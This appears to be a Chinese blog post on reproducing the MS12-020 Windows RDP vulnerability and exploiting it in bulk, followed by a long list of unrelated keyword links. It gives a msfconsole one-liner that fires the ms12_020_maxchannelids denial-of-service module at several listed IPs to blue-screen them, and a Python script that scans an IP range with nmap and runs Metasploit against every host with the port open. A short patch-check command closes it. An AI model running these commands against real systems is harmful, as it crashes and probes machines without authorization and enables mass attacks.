MS12-020漏洞复现及自动化批量利用
发表于:2024-12-12 作者:千家信息网编辑
千家信息网最后更新 2024年12月12日,漏洞描述Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)影响目标Windows XP sp3Windows xp sp2Windows Vista sp2
千家信息网最后更新 2024年12月12日MS12-020漏洞复现及自动化批量利用
漏洞描述
Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)
影响目标
Windows XP sp3Windows xp sp2Windows Vista sp2Windows 7Windows Server 2003Windows Server 2008Windows Server 2008 R2
msfpayload利用
msfconsoleuse auxiliary/dos/windows/rdp/ms12_020_maxchannelidsset rhost run
此pyload仅支持单目标。
通过msfconsole快速启动
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
通过bash脚本批量生成检测脚本(nmap-port2ip.py)
#encoding:utf-8import xml.saximport sysimport osclass MovieHandler( xml.sax.ContentHandler ): def __init__(self, filterport=None): self.CurrentData = "" self.port=filterport self.data = "" self.datas=[] # 元素开始事件处理 def startElement(self, tag, attributes): self.CurrentData = tag if tag == "address": self.data=attributes["addr"] # 元素结束事件处理 def endElement(self, tag): if self.CurrentData == "address": self.datas.append(self.data) self.data="" self.CurrentData = ""class Gather(object): def __init__(self, filterport=None): # 创建一个 XMLReader self.parser = xml.sax.make_parser() # turn off namepsaces self.parser.setFeature(xml.sax.handler.feature_namespaces, 0) # 重写 ContextHandler self.Handler = MovieHandler(filterport) self.parser.setContentHandler( self.Handler ) def run(self, port): self.Handler.datas=[] self.parser.parse(port+".xml") print(self.Handler.datas) def get_ans(self): return self.Handler.datasif __name__ == "__main__": if len(sys.argv) !=3: os.exit() os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml") g = Gather() g.run(sys.argv[2]) # create cmd cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;' ips = g.get_ans() if len(ips)>0: for ip in g.get_ans(): cmd += "set rhosts "+ip+";run;" cmd += 'exit;"' os.system("msfconsole -x " + cmd)# 使用方法python nmap-port2ip.py # 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致# port仅支持单端口
漏洞补丁检测
systeminfo | find /i "KB2621440"如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。
Windows Server 2003补丁
参考文章
- 微软MS12-020
漏洞
补丁
支持
检测
主机
事件
代码
元素
桌面
目标
脚本
处理
一致
使用方法
功能
形式
文章
方法
格式
端口
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
c 连接sql数据库
长春华易软件开发
网络安全攻防大赛赛项
deap数据库
全球网络安全行业专利申请数量
ppt可以制作数据库吗
我国网络安全保护
检索数据库有多少条数据
奕天网络技术
服务器没有图形界面怎么上网
国际 国内的网络安全时间
青少年网络安全ppt总结
网络安全工作时长
软件开发是不是很高工资
太原耐特安网络技术有限公司
二战风云2二战服务器
7天 软件开发
武汉网络安全与人才创新峰会
视频服务器的搭建
上海万物新生集团公司软件开发
网络安全法公开征意见
济源网络技术销售价格
软件工程专业网络安全
吉利对供应商产网络安全的要求
海天味业软件开发团队
江津区常规软件开发流程要求
热门笔记本电脑软件开发
数据库会议室预订系统
连云港常规网络安全
软件开发数组